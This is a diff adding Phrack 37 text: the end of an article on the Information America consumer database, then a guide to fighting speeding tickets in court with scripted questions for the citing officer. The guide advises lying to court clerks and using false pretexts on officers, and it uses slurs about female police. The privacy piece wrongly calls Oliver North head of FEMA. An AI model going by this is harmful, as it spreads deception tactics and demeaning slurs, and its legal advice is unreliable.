+MarketPlace.  What Lotus was doing wasn't unusual; large direct marketing
+firms, like National Demographics & Lifestyles (NDL) have been somewhat
+covertly marketing consumer names and information on CD ROM for years (with
+information such as how many telephones you have; the approximate ages of your
+household's members; the gender of the household head; the number and type of
+cars your household has; what the mortgage value on your house is; estimated
+incomes for the heads of the household, etc...).  The difference was that
+Lotus was offering their CD ROM commercially so that anybody could, as the
+public claimed, have the power of "Big Brother" at their fingertips.  If the
+public knew about Information America, knew that anyone could tap its eye-spy
+capabilities, the outrage would be tremendous.
+
+     To market its database services, IA seems to have adopted a grass-roots
+kind of approach.  IA employs liaisons in major metropolitan cities whose
+job it is to research and contact prospective clients -- lawyers, for example.
+We are unaware of any advertising in specialized journals.
+
+     We take for granted the existence of government-run databases which
+contain even more detailed information on Americans than IA possesses.  Even
+so, those databases are considerably smaller, and what's more, they're
+well-regulated: the agencies that run them accountable by Law.  The potential
+for abuse by a system like Information America -- devoid of any checks and
+balances -- is spectacular.  MoD has already demonstrated this to a small
+extent.  The same technology advances which were supposed to make at-home
+shopping a convenience and tailor marketing to your needs have now made
+surveilling you cost-effective, accurate and as easy as touching a key.
+
+     One of the least reported items to come to light out of the Iran/Contra
+proceedings was that, as head of the Federal Emergency Management
+Administration (FEMA) -- the organization which coordinates relief efforts
+across the United States during natural disasters -- Oliver North had drawn up
+FEMA contingency plans of a different sort: in the event of war in Central
+America, the Constitution was to be suspended and FEMA was to round up aliens
+(particularly Hispanics) and US Citizens considered "subversive," and
+interrogate them in Manzanar-like camps.  Databases like Information America
+would no doubt have been employed in locating the whereabouts of these people.
+
+     The importance of Information America isn't what it can do for you;
+rather, what can be done with it to you.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+     White Knight and I can be reached at WKnight@ATDT.ORG and Omega@ATDT.ORG,
+respectively.  Additionally, we may be reached on Demon Roach Underground or
+Pure Nihilism.  We welcome any questions or comments you may have -- especially
+any new information you may be able to add.  Please do not contact us asking
+for accounts or passwords.
+_______________________________________________________________________________
diff --git a/phrack37/5.txt b/phrack37/5.txt
new file mode 100644
index 0000000..a1922df
--- /dev/null
+++ b/phrack37/5.txt
@@ -0,0 +1,942 @@
+      _____                 BEATING THE RADAR RAP                 _____
+     /   / \                                                     /   / \
+    (  5/5  )         Part 1 of 2 : "Your Day in Court"         (  5/5  )
+     \_/___/                                                     \_/___/
+                                 by Dispater
+ ______________________________________________________________________________
+|              |
+| Introduction |  Welcome to the first of two parts in a series designed to
+|______________|  inform you about some of the aspects (both legal and
+                  technical) concerning traffic radar.  The second part will
+appear in Phrack 38.  I recommend you read both parts before attempting to
+apply the information you learn from this file.
+
+Any hacker will tell you to ALWAYS find out as much as you possibly can about
+any endeavor and weigh the risks before you act.  For most of us driving is
+something that we must do in order to have a career, get to school, and enjoy
+ourselves.  Therefore it is essential to know the rules of the road and to know
+what will happen to you when you make a mistake.  For the majority of us, this
+mistake means being given a speeding ticket or some type of moving violation.
+
+This file will explain how to handle the situation should you ever need to go
+to court over a speeding ticket.  I intend to provide you with a basic
+background so that the odds are a little more even.
+
+One of the nasty things about traffic court is that for some reason, the burden
+of proof has flip-flopped from the state having to prove you are guilty (the
+way it is supposed to be) to the defendant having to prove that he/she is
+innocent.
+
+First of all you are not alone in your quest to seek justice.  Most judges
+are not evil and hateful.  If you come into court, neatly dressed (not fancy,
+just look like a "semi-normal" person.), well informed of the issue, courteous,
+and acting a little humbled by the experience, the judge may lean a little more
+to your side.  If you go to court, you will see a number of idiots who will
+stand up in front of the judge and argue or say "I wasn't doin' nothin'.  I was
+just bein' harassed.  I'm right and this pig was wrong. Nyah!"  Obviously, the
+judge will not take kindly to this type of behavior.  Would you?
+
+In order to be informed, I HIGHLY recommend that you get in touch with the:
+
+National Motorists Association               Membership: $20 student 
+6678 Pertzborn Rd.                           per year    $35 everyone else
+Dane, WI  53529
+Phone : 1-800-882-2785
+
+The NMA provides a great deal of resources to those of use who drive.  They
+provide (with membership) a legal resource kit for a rental fee of around
+$20.00 a month.  This kit consists of 2 video tapes, 2 books, and a HUGE stack
+of information.  Much of the "HUGE stack of information" consists of precedent
+cases in which the defense won, ALL radar gun manuals, lots of related news
+articles, error analysis information on vascar and other useful tidbits of
+information.  It is excellent and I urge anyone who drives to get involved. 
+The NMA, among other things, is the nice name for the "anti-55 people."  They
+claim that it is up to the local governments and states to come up with their
+own speed limits.  It's not Washington's job to tell the rest of us how to
+live!
+
+The last thing I want to mention is that this is NOT a comprehensive file.
+Reading this will NOT make you a lawyer.  If you can afford a lawyer, hire one.
+It is intended for people like me who can't afford a lawyer but who have some
+intelligence and guile in their personal make up.  There's more than one way to
+skin a cat (cop) and you should NOT take this as a word for word way to proceed
+if you get nabbed for speeding.  I intend for this to be the basis for building
+a good foundation for a case and to give you some ideas on how you might want
+to proceed.  Do not go into the court room half-cocked.  A good lawyer always
+knows the outcome of a case before he steps into the court room.
+ ______________________________________________________________________________
+|                 |
+| You Get Busted! |  So the red lights are blinking behind you and your radar
+|_________________|  detector is going wild because you weren't paying
+                     attention because you were too busy messing with the radio
+and jamming to MC 900' Jesus so loudly that it shakes the widows of the car
+next to you.  The first thing you want to do is pull over immediately!  Don't
+try to be an bad ass and out run them.  In most cases the cop's car can go
+faster than yours and besides, he has a radio.  After you pull over, just hand
+him what ever he asks for and play in his desire to be "in control".
+Always say, "Yes sir" and "No sir"  They LOVE that.  Be as NICE as you can.
+Act "humbled".  I know this may sound difficult but just TRY.  ALL and I mean
+ALL people that become law enforcement officials have taken that job because
+they have some personality disorder that they NEED to feel in control of others
+and a NEED for others to respect them.  This is a weakness in their
+personality, in my opinion.  Anyway, If he just had a good round of golf that
+day, he may only write you a warning.  If he still insists on writing you a
+ticket, he will at least know that you will not be a threat to him.  ALL
+police officers, especially in large urban areas, will always approach your car
+as though you are going to shoot them.  Make the officer thinks you are nice
+person (for the moment) and that your just weren't paying attention and you
+made a mistake.  Again, as soon as you prove to him you are not a threat, he
+will relax and things will go much easier for you.  I ALWAYS do this and the
+officer is actually NICE back to me most of the time.  Even though his first
+impression is "long haired kid in a hot rod car wearing a Metallica shirt," the
+encounter usually ends with a "Have a nice day." or a "Just make sure you be
+careful now. ok?"
+
+NOTE:  If you are pulled over by a bull-dyke female cop, you are totally
+fucked.  Social engineering is totally useless.  ALL and I mean ALL bitch cops
+are just looking to prove something.  They have a bad attitude because the "old
+boy" network back at the station doesn't like them and they think that most
+males will look on them as less of an authority figure merely because they are
+female, if they do not compensate (overcompensate) for the fact that they are
+women.  They think that they will be challenged more often than not by you.  I
+have yet to ever meet a NICE female cop.  Lets face it, if they were NICE they
+would probably be an attorney or something.  If you are women police officer
+reading this and you are not like what I have just described in the above
+paragraph then just ignore it and tell your cohorts to adjust the attitude!
+
+Continuing on...As you are sitting there with everyone slowing down to take a
+look at you, make note of EVERYTHING!  Write down the following:
+
+1) Location (intersections, curves, condition of the road)
+2) Weather (rain, fog, snow : all hinder traffic radar)
+3) Traffic and all types of vehicles present (large trucks?)
+4) Time (rush hour?)
+5) Buildings present (airport? radio station? bank? microwave towers?
+   power lines? hospital? telephone office?)
+6) Officer's attitude (if he's angry this will play in your favor later) 
+7) Etc (anything else I failed to list here)
+ _____________________________________________________________________________
+|                                       |
+| Your Ticket and Pre-Trial Experiences |  So.  Now in your possession you have
+|_______________________________________|  a little gift from whomever had a
+                                           bad day at work.  The first thing
+you will want to do is make sure that all the information on the ticket is
+correct.  If it is not, make sure that you take note of this and be sure to
+mention it as soon as your trial begins!  You might be able to get off on a
+technicality.  Another thing to check for is to make sure that the officer
+didn't write any little messages to the judge on the back of the ticket.  If he
+wrote "radar detector." or some other irrelevant evidence, make sure you point
+out to the judge that that the speeding ticket is inadmissible as evidence in
+court due to the fact that it contains information that does not pertain to the
+case.  The idea behind this is that most people that are caught speeding have
+radar detectors.  Therefore, the cop will try to play on this fact in an
+indirect way.  Even though this evidence is irrelevant, he will attempt to
+submit it.  If the judge is cool, you'll get off on a technicality.  Other ways
+to get off on technicalities is to make sure that EVERY tidbit of information
+is CORRECT.  Incorrect information is a great way to get off.  This is a
+"procedural error" and might get the case dismissed.  Continuing on....
+
+Ok, so the ticket says you have to appear in court December 21st at 4:00.  All
+this means is that if you wish to pay the ticket you must do so by this time
+and date.  This does not usually mean you will actually go to court on this
+date.  What you do next is go to the clerk's office and hand the lady behind
+the counter the ticket and say that you wish to contest it.  They will set up
+a date (usually much later in the year sometimes a YEAR LATER if things are
+really backed up) and give you a piece of paper that you must bring to court
+with you.  I highly suggest to everyone to ALWAYS, ALWAYS, ALWAYS contest a
+ticket.  Hell, you have to pay court fees whether you show up or not so you
+might as well go, right?  The point is to make them work for your money!
+
+One good plan of action is to go to court a few weeks ahead of time and observe
+how proceedings work in your local court room.  Just tell the bailiff that you
+are a criminal justice major and want to see how traffic court works and
+observe what REALLY goes on instead of reading it in a text book.  If you are
+really clever, you might just want to ask one of the cops if you can go out and
+watch how police officers bust people speeding.  Use the oldest, most classic
+social engineering maneuver ever invented, "It's for a paper for class."  Let
+them think you are interested in becoming a cop.  I don't care what they do or
+who they are, if someone comes up to them and appears to take interest in their
+profession, they will always be flattered.  Always flatter the hell out of
+anyone you want to engineer!
+
+The first thing you want to do before actually going to court yourself, is
+to not go to court.  About a week before the trial or less, call the clerk's
+office and ask for a "continuance."  Tell them that your boss told you that
+you have to go out of town the day of the trial and they will schedule you
+a new trail date.  This is important because most police officers are less
+willing to show up.  Thus if he's not there to prosecute you, you get off!
+ _____________________________________________________________________________
+|                                          |
+| Here come de Judge!  Here come de Judge! |  Ok, so you're now sitting there
+|__________________________________________|  in the presence of the other poor
+                                              idiots that are in a similar
+predicament as you are.  As you are sitting there sweating your ass off (being
+this is your first time in court, hopefully)  Make sure you make note of other
+people's cases.  What do the officers say when someone mentions traffic radar?
+See above above paragraph about testing the water a little.  I have obtained a
+ton of information on how departments REALLY operate when they know I'm not
+there to pressure them.  Use the lame statements the officers make against
+other officers and the rest of the department, when it's your turn.  One time,
+before it was my turn I watched this one cop say, "The radar units are
+calibrated by the manufacturer and sent to us." Needless to say, I won that
+case!
+
+Now the bailiff calls out, STATE OF TEXAS v. MR. OFFENDER!  By this time you
+should know the routine.  As soon as the judge opens things up to you ask
+him/her if you can examine the witness.  They will say, "yes."  Here is where
+you begin to make your case.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+PRELIMINARY QUESTIONS : "What?!?!?!"  This is what the cop has going on inside
+his head right now.   You are no longer the innocent fool you appeared to be in
+your car?  He immediately raises his guard and you must lower it my placing a
+few questions to him and wearing him down.  This part of the questioning is
+done to see if he can remember the exact circumstances under which he pulled
+you over and to get him used to you taking control of the interrogation.
+
+A. What type of radar were you using on the date the citation was issued?
+
+  - Make sure he gives you the model name and number.  Answers like "traffic
+    radar or Doppler radar" should not be permitted.
+
+B. Please relate the facts concerning the citation as you remember them.
+
+  - Make note if anything differs from what you remember to be true.
+
+C. Was your audio doppler engaged at the time the citation was issued?
+
+  - If he says he doesn't know what that is, he hasn't been trained!  The hand
+    held units.  (Speedgun series don't have audio doppler!)  This is a good
+    question to trip him up on!  If he says he had it engaged, merely whip out
+    the manual and ask him if to point out where the heck it is.  OR you can
+    ask to subpoena the unit to court and ask him to find it!
+
+D. What speed was your audio alarm set for?
+
+  - If he says he doesn't know what that is, he hasn't been trained!
+
+E. Was your automatic speed lock engaged?
+
+  - If yes, you have already started to build your case that they made an
+    error.  If not then keep going.
+
+F. Were you stationary or moving at the time your radar unit's alarm went off?
+
+  - Who cares unless you want to go off and provide some kind of "cosine-error"
+    evidence later.
+
+G. Was I coming toward you or away from you?
+
+  - Again, this doesn't matter
+
+H. Did you see me prior to the time your radar's audio alarm went off?
+
+  - This is important,  you are in effect asking him if he took a traffic
+    history before he set up camp behind the bushes waiting to pop people.
+
+I. Could you estimate my speed?
+
+   Irrelevant
+
+J. What was the apparent speed?
+
+   Irrelevant
+
+K. How many seconds did it take you to react between the time you first saw
+   my vehicle and the time your audio alarm sounded?
+
+  - This doesn't matter, unless it was a case of you coming around a curve or
+    over a hill and old Smokey is there waiting to bust the first thing that
+    makes his little machine go beep.  He must have tracked you long enough to
+    get a good reading.  This should be about 5-8 seconds to take into account
+    spurious readings.  If he didn't wait that long he is ignoring his
+    training.
+
+L. Using this paper could you make a map of the area?
+
+  - Most of the time to police officer will be unable to remember details of
+    the surroundings since he hands out many tickets a day.  This is a good
+    place to establish doubt.  
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ESTABLISH THE OFFICER'S LEVEL OF QUALIFICATIONS:  This is done in an attempt to
+make the police officer appear as unqualified as possible.  Make the officer
+appear to have as little training as possible and be as unfamiliar with the
+radar unit as possible.  The bigger a fool you can make the cop out to be the
+more points you'll score with the judge.  
+
+A. How long have you been a police officer?
+
+   Irrelevant unless he's just come straight from the academy
+
+B. How long have you been operating radar?
+
+   Irrelevant unless it's a year or less.
+
+C. Have you received formal training on the operation of radar?
+
+  - If NO then you've hit pay-dirt.
+
+D. Under what circumstances did you receive this training?
+
+   Irrelevant unless he says, "in the locker room."  In this case he may be
+   on your side.
+
+E. How many hours of classroom training did you receive?
+
+  - This is an important answer.  If he says four or less, he's probably not
+    qualified.  Make note.
+
+F. How long ago did you receive this training?
+
+   Irrelevant unless the answer is five or six years ago.  He may be out of
+   practice and probably wasn't trained on the model he used to bust you.
+
+G. Who taught the class?
+
+  - If it was his sergeant, you have a case of the blind leading the blind.  If
+    it was the radar manufacturer you have a potentially biased source since
+    the manufacturer will do anything to sell it's merchandise!  If he was SENT
+    to the manufacturer's school he's better than most.
+
+H. Since initial training, have you had any brush-up courses?
+
+  - If he says yes, he's full of more shit than you are.  Ask who taught them
+    and when they were.
+
+I. Do you believe yourself to be a competent radar operator?
+
+  - Sure he does
+
+J. Do you hold a certification?
+
+  - In some states he MUST be trained at the manufacturer's school.  If he says
+    his sergeant certified him.  You may be able to walk out of court right
+    there.  It's a case of the blind leading the blind.
+
+K. Did you receive your initial training with the model (the one he popped you
+   with)?
+
+  - If his formal training was with another unit, you've hit pay-dirt again!
+
+L. How many one-on-one sessions of field training did he receive?
+
+  - Answers like, "I rode with another officer while he wrote tickets." are not
+    good.  Keep pressing him on this issue.  Most likely he did not have this
+    type of training unless it was done by a factory representative and then
+    there were three other officers in the car at the time.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+ESTABLISH THE LEVEL OF TRUST THE OFFICER PLACES IN HIS RADAR:  These questions
+are used in an attempt to make it appear as though the police officer himself
+questions the reliability of traffic radar.  This is where things get fun and
+he could even purger himself if he's not careful.  In which case you win again!
+
+A. Do you believe the (radar unit he popped you with) to be a good unit?
+
+  - Of course he does.  If he doesn't he may be on your side.
+
+B. Have you ever encountered problems with the (model) radar?
+
+  - If he says yes, make sure he tells you details, and not simply, "It quit
+    working one day."
+
+C. Are you permanently assigned to one specific radar unit?
+
+  - They will always switch around.  He will most likely say that he uses the
+    same brand name but different models.
+
+D. Do you believe there to be differences between brands of radar units or
+   models?  Will one have idiosyncrasies that others may not have?
+
+  - He will most likely say that they all work alike.  If he says he has
+    differences make sure he tells you exactly what they are and how he noticed
+    them.
+
+E. Do you believe that the (model radar) ever gives spurious or false readings?
+
+  - If he says "no."  Make sure you have documented evidence of this. (see
+    above information on the NSA)  This is a real good way to make him look
+    like an idiot.  Make sure that you repeat the question and emphasis the
+    word "NEVER."  After he says no again, hand the document to the judge and
+    say something to the effect that, "I have written evidence right here that
+    was written by an independent engineering firm that proves that (model
+    radar) does have the capability to give false readings.  Now, in a court
+    of law you are not permitted to defend yourself while examining the
+    witness, however, since you are not an attorney.  The judge may permit you
+    do submit your testimony.
+
+    If the officer says "yes" he has seen false readings, ask him what
+    percentage of the time it does give spurious readings.  In the case
+    STATE OF WISCONSIN vs HANSEN, in which HANSEN prevailed.  It was proven
+    that radar can give false readings up to 20% of the time.
+
+F. Do you believe you can always tell the radar unit is giving a spurious
+   reading? 
+
+  - He will always say he can.  If he says, "no" then you've already
+    established reasonable doubt.  When he says "yes," then proceed with the
+    next two questions and then come back to this one again.
+
+G. Is there is a special number that appears on the screen that indicates a
+   false reading.
+
+  - Not!
+
+H. Does the unit give some visual indication that the reading is suspected to
+   be false?
+
+  - Not!  (Believe it or not!  The very first case I went to defend myself,
+    the idiot cop said that there was an "indicator light that noted when
+    there is radar disturbance in the area."  HAHAHAHA!!!  What a joke.
+    I asked him to point it out to me and of course he couldn't.  Therefore
+    he just lied under oath.  He fucked himself hard!  Needless to say the
+    judge wasn't too pleased, to see a police officer lying either! ;-)
+
+I. How then can you tell that the reading you are getting is spurious?
+
+  - He will answer that there is no target or that the car is obviously not
+    speeding.
+
+J. You said that there isn't some special speed or number that appears on the
+   screen.  All 86 mph speed readings are not spurious for example?
+
+  - Of course not.
+
+K. So the spurious reading could be either 20mph or 70mph?
+
+  - Of course.  If he says not, he is out of his league and attempting to
+    evade answers.
+
+L. The radar could give a speed of 20mph or 70mph, but you could see clearly,
+   for example, that the car was going only 30mph?
+
+  - He should agree with that.
+
+M. What if a car was going 55mph and you got a reading of 70mph?  Is this
+   possible?
+
+  - He should agree with that.
+
+N. Assuming a car was approaching you at 55mph.  You could recognize that?
+
+  - He'll probably say he could. If he does, keep going.  If he says he could
+    not then you've already established doubt.
+
+O. If a car was approaching at 55mph and you get a reading of 56mph.  Could
+   you tell that it was a spurious reading?
+
+  - Of course not.  At this point keep the pressure on by rapidly asking the
+    question over and over again and increasing the false reading by one mph
+    until he gives.  If you've led the cop into this trap you are doing great!
+    He is totally fucked if he answers either "yes" or "no."  This is because
+    you are establishing more doubt each time he says "no" and if he does say
+    "yes" too soon he will appear to have some super-human quality!
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+USE OF AUDIO DOPPLER, AUDIO ALARM, AND AUTOMATIC SPEED LOCK:  All radar units
+include features designed to make the officer's job easier.  The AUDIO DOPPLER
+can be turned down or off, as is usually done, therefore it contributes nothing
+to reliability.  The AUDIO ALARM is a warning tone that tells the officer the
+radar unit has "got one", and it is built into all radar units.  The officer
+must dial in a speed above which he wants the alarm to sound.  The only way
+to disengage the alarm is to dial the speed to 99 mph or 199 mph on some
+models.  The AUTOMATIC SPEED LOCK is the worst thing ever put in a radar unit.
+It automatically locks up a speed reading when one comes above the preset
+level.  If the reading is spurious, the officer never knows it.  Your goal here
+is to establish his normal operating habits.  Later, you'll find out how he was
+using radar on the day he busted you.
+
+A. Does your radar unit have an audio Doppler?  That is a continuous audio
+   single tone which converts the radar unit's Doppler shift into an audible
+   signal?
+
+  - He will say his unit does, unless it's a Speedgun, in which case it
+    does not.  If it was a Speedgun jump to question "M".
+
+B.  Does the audio doppler have a volume control?
+
+   - Yes it does.
+
+C. Do you ever use your audio doppler?
+
+  - If he says "yes" continue.  If he says no skip to question `M`.
+
+D. About what percent of the time will you listen to the audio doppler?
+
+  - note percent
+
+E. When you operate your radar unit with audio doppler on do you operate it
+   at full volume?
+
+  Heh, yea right!
+
+F. At what volume do you operate it?
+
+  - The question can only be helpful if he says he operates it at a low volume.
+    Try to ask him a few similar questions that will make him answer "low
+    volume."  IE: "I know that that tone get's awfully annoying doesn't it?"
+
+G. Do you ever turn it off?
+
+  - Sure he does.
+
+H. Why do you turn it off?
+
+  - Because it is irritating as hell!
+
+I. Does the use of audio doppler ever interfere with your use of the police
+   radio or your conversations with other officers?
+
+  - He should say it does.
+
+J. So you operate with the audio doppler off about ___ percent of the time?
+
+  - Fill in the number that he gave you earlier.
+
+K. Of the rest of the time, how often do you operate it with the volume on
+   soft.
+
+  - (Note the percentage)
+
+L. Do you consider the audio doppler an important tool to prevent operator
+   error?
+
+  - Only important if he says "no".
+
+M. Is your radar unit equipped with a dial that lets you select a speed above
+   which an audio tone will sound if a violation speed is picked up?
+
+  - Yes, all radar units have this feature.
+
+N. We'll call that feature the AUDIO ALARM.  Do you commonly use that feature?
+
+  - He has to.
+
+O. What percentage of the time do you use this?
+
+  - If he answers anything less than 100%, ask him how he disengages it.  He
+    would have to disassemble the whole radar unit.
+
+P. If the speed limit on a highway is 55, what speed do you normally dial in
+   as your pre-set violator speed?
+
+  - Note speed.  The answer isn't critical.
+
+Q. Do you find that feature to be a useful one for you?
+
+  - He'll probably say it's sometimes useful.
+
+R. If a violation speed causes the alarm to sound, you need only reach over to
+   lock in that speed, is that correct?
+
+  - That's how it works.
+
+S. Does your radar unit also have a button or switch which permits the radar
+   unit to automatically lock up the violation speed?
+
+  - Yes, it does.
+
+T. Do you ever use that automatic speed lock function?
+
+  - If he says "no", repeat the question with an emphasis on the "ever" and
+    look skeptical.  If he still says no, skip to the next question section.
+
+U. About what percent of the time do you use the automatic speed lock?
+
+  - Note percent.
+
+V. Do you find that automatic speed lock convenient?
+
+  - Sure he does. That way he can read a magazine or take a nap while the radar
+    unit does the for him!
+
+W. Do you use the automatic speed lock for any other reason?
+
+  - Note reasons, if any.
+
+X. Was the use of the automatic speed lock included in your training?
+
+  - Answer isn't important.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ESTABLISHING WHETHER THE OFFICER USES A VISUAL BACK UP:  When cops go to court,
+they have a "model testimony" used to establish their reasoning for giving out
+a ticket.  One part of this testimony usually centers on the radar unit used
+only as a backup to their visual perception that you, the defendant, were
+traveling at a "high rate of speed" or at "X mph."  Put in it simplest form,
+this is total hogwash.  A trained officer can make a visual identification of
+speed at a distance of perhaps 500 feet.  The radar can theoretically make that
+same speed determination at 5000 feet.  The radar's alarm will sound many
+seconds before the policeman can make a visual speed determination.  As it is,
+the cop will observation of a car will verify what the radar has already told
+him.  THIS IS WRONG!  The law states that "radar readings can ONLY be used as
+corroborative evidence."  If the cop sees that the car is traveling slower than
+what the radar says, he will merely assume that the driver saw him and slowed
+down.  The following questions are used to establish whether or not the cop did
+use visual back up, and trap him onto making a statement which can later be
+used against him!
+
+A. I'm going to start this question by defining a term I call a "traffic
+   history".  A traffic history is the continuous observation of traffic by a
+   police officer.  If an officer takes a traffic history, it means he is
+   CONTINUALLY WATCHING TRAFFIC; looking for speeders, drunken drivers, or any
+   other offenders.  Do you understand what I mean by a traffic history?
+
+  - If the officer doesn't understand, keep explaining until he does.
+
+B. With regard to speeding tickets, an officer who says he normally takes a
+   traffic history can say that he observes traffic patterns for a period of
+   several seconds -- usually three to five seconds -- before he sees what he
+   believes to be a speeding incident.  That is, three to five seconds before
+   his radar unit sounds its alarm.  He then continues to observe traffic fora
+   period of several seconds while he determines that a citation should be
+   issued.  Do you understand that definition of a traffic history as it
+   applies to speeding tickets?
+
+  - The officer should understand.
+
+C. Using that definition, have you EVER taken a traffic history prior to
+   issuing a speeding citation? 
+
+  - He will probably answer that he has.  If he says no, see answer E.
+
+D. About what percent of the time can you say you have taken a traffic history 
+   when you issue a speeding ticket?
+
+  - Note percent.  It will probably be very high.
+
+E. Do you believe it is important to take a traffic history in speeding cases?
+
+  - He'll probably say "yes."  If he says no, you have a strong argument in
+    court, namely that he had no visual backup; that he was relying solely on
+    his radar unit.  His "yes" answer, in conjunction with the fact that he
+    didn't take one in your case, can be used against him in court.
+
+F. At about what distance can you make a determination that a car is doing a 
+   certain number of miles per hour?
+
+  - Most policemen answer about 500.  If he hedges or says it depends, set up a
+    specific situation, for example, he is in the median strip of a level,
+    straight, uncrowded highway.  At what distance can he make a visual
+    determination of the speed of an approaching car?  If he says he still
+    can't say, throw the 500 feet figure at him and see if he agrees.  Shorten
+    and lengthen the figure to get an estimate he can live with.
+
+G. When you take this traffic history and make a visual assumption about speed,
+   you do so BEFORE your radar unit has sounded its audio alarm?
+
+  - THIS IS A TRICK QUESTION.  If he says "yes", he's in trouble because his
+    radar unit's range is doubtlessly longer than his visual acuity.
+    If he says "no", then he hasn't really taken a traffic history.
+    If he says "yes", ask questions H and I.
+    If he says "no", ask questions J, K, L, M, N, and O, P, Q, R.
+
+H. Approximately what is the range of your radar unit?
+
+  - He'll probably say he doesn't know.  Throw figures between 3,000 and 5,000
+    feet at him and see if he agrees with any of them.  If he still doesn't 
+    know, ask if he'd be surprised to find out that his radar unit had a range
+    of at least 3,000 feet.  If he says yes to that question, you have just
+    nailed him on a vital technical question.
+
+I. But you still stick to your statement that the radar unit does not sound an
+   alarm prior to your being able to recognize the true velocity of a car?
+
+  - Regardless of his answer, you've made your point.
+
+J. Then you don't really take a traffic history.
+
+  - The neatest answer is "no", which he probably won't say.  Instead, he'll
+    say that sometimes it does and sometimes it doesn't.  For the "sometimes it
+    doesn't" answers, go back to questions H and I.  For the "sometimes it
+    does" answer, continue.
+
+K. If the radar unit sounds an alarm before you've had a chance to ascertain  
+   that a car is speeding, how can you say you've taken a traffic history?
+
+  - He'll probably say it alerts him to look for a speeder.
+
+L. Do you look down to see how fast the radar unit says a car is going?
+
+  - He'll probably he looks.  If he says he doesn't look, tell him, "but you
+    know a car is definitely going at least X mph over the speed limit?"  To
+    that, he has to answer yes.
+
+M. Does the knowledge that the radar unit has already "got one" influence your
+   judgement in making a visual determination of a car's speed?  That is, will
+   you be more likely to agree that a car is going a certain number of miles
+   per hour after the radar has already said that it was going that speed?
+
+  - He should agree.  If he doesn't, ask him why he doesn't just run his alarm
+    setting up to 99 mph to make certain it never influences his judgement?
+    His answer won't matter.
+
+N. Would you be more inclined to believe that a car in the left lane of a four-
+   lane highway was a speeder if you heard your audio alarm go off?
+
+  - If he's honest, he'll say yes.  If he isn't, he'll say, "if it was passing
+    another vehicle".  Counter with "what if there wasn't a reference vehicle
+    present, but the car was still in the left lane?  If he still says "no",
+    ask him again why he doesn't just run his alarm counter up to 99 mph.
+
+O. If there was a car going slower than the speed limit in the right lane, and 
+   a car driving at the speed limit in the left lane apparently passing it, and
+   your radar unit either malfunctioned or misread the target, might you
+   mistakenly conclude that the car in the left lane was speeding and issue the
+   driver a citation?
+
+  - If he's honest, he'll answer "yes", building your case for operator error.
+    If he says "no", he could tell the car in the left lane wasn't speeding, 
+    you're back to question F.
+
+P. If your radar unit said it had picked up a car going, say, 70 mph, and when
+   you were able to make out its speed, it was clearly going the speed limit,
+   would you be inclined to believe the motorist had seen you and quickly
+   slowed down?
+
+  - The honest officer will say yes.
+
+Q. Would you still issue the citation based on the radar reading?
+
+  - Again, he should say "yes".
+
+R. Why do you set your alarm counter for a certain number of miles per hour
+   over the speed limit?
+
+  - His answer may be that he was trained to do so (unusable), or that he needs
+    it for special circumstances (worth following up).  Any excuse will be
+    lame.
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+ESTABLISHING THE LEVEL OF KNOWLEDGE ABOUT BEAM WIDTH AND RANGE:  Under
+HONEYCUTT, a police officer does not need to know the inner workings of his
+radar unit in order to have his testimony accepted by the court.  The mistake
+is made by many persons challenging radar-backed speeding citations is to try
+and demonstrate to the court that they know more about radar than the cop that
+issued them a ticket.
+
+It really doesn't matter how much you know about radar.  All the court wants to
+know is how much the officer knows.  Few judges have ever questioned the
+qualifications of the citing officer.  Your job as a defendant is to make the
+judge do just exactly that!  You will have to plant a seed of doubt in his/her
+mind by showing that in several key areas, the officer doesn't know fundamental
+aspects of radar.
+
+A. With respect to everyday operation of your radar unit, do you know what its
+   approximate range is?
+
+  - Depending on the model, the answer can range from 3,000 to 7,000 feet.
+    Refer to second article in this series that will appear in the next
+    exciting issue of Phrack!
+
+B. At a distance of 1000 feet how wide is the radar beam?
+
+C. About how far from the radar antenna will the beam be when it is width of
+   one lane of traffic, or about 11 feet?
+
+D. With what degree of certainty can you point your radar's antenna at, say,
+   the left lane of oncoming traffic and at a distance of, say, 500 feet
+   be focusing on just that lane of traffic?
+
+ - The answer is zero.  Anything else and he is wrong.
+
+E. In the stationary mode, you can lock the speed of traffic in either
+   direction, that is, you can flip the antenna to record traffic going away
+   from you or traffic coming toward you.  Is that correct?
+
+  - Yes it is.
+
+F. Can your radar differentiate between traffic direction?  For example, if
+   you're setting along a expressway, and you have your radar unit pointed
+   toward you oncoming traffic, will your radar unit pick up only oncoming
+   traffic, or might it also pick up traffic on the other side of the median
+   strip moving away from you?
+
+  - It will pick up traffic in either direction.  Any other statement (e.g.
+    "sometimes it does and sometimes it doesn't" is ignorance.)
+
+G. In moving mode, can your radar pick up traffic both coming toward you and
+   traffic moving away from you?
+
+  - The Speedgun 8 is the ONLY radar that can do this.  It can only clock cars
+    coming toward it.  No other radar unit can do this!
+
+H. [In the next two questions you will have to draw a picture.  Draw a vertical
+          roadway with a car (#) going up toward the top and the cops car
+   | . |  oriented perpendicular to the road (<:=).  Next draw a line that is
+   | . |  perpendicular to the roadway (<---). This is the radar beam.  You
+   | . |      should have a slightly larger drawing :) that looks similar to
+ <-------<:=  the one to the left.  Hold this up so that the judge and the cop
+   | . |      can see it and ask the following question.]
+   | .^|   
+   | .#|
+
+   In this diagram, the radar is held at right angles to the roadway.  A north
+   bound car driving at 55mph enters into the radar beam.  Will the radar unit
+   pick up the car?
+
+  - It cannot.  There is NO doppler shift because there is no closing speed
+    between the vehicle and the radar unit.  If he answers correctly, skip to
+    question "J".
+
+I.  [Again you need to draw a picture similar to the one above, but this time
+    add a car going in the opposite direction, in the other lane of course!
+    It should look something like the picture below.  Now present this to the
+          cop and the judges and ask the following: (Refer to this as
+   |#. |  fig. `2`)]
+   |~  |
+   | . |        
+ <-------<:=
+   | . | 
+   | .^|
+   | .#|
+
+   In this diagram, two cars are approaching from opposite directions, with the
+   radar unit sill pointed at right angles on the highway.  The north bound car
+   (right) is going 55mph.  The southbound car (left) is going 65mph.  Which
+   car will the radar unit pick up and how will you be able to distinguish
+   between the two?
+
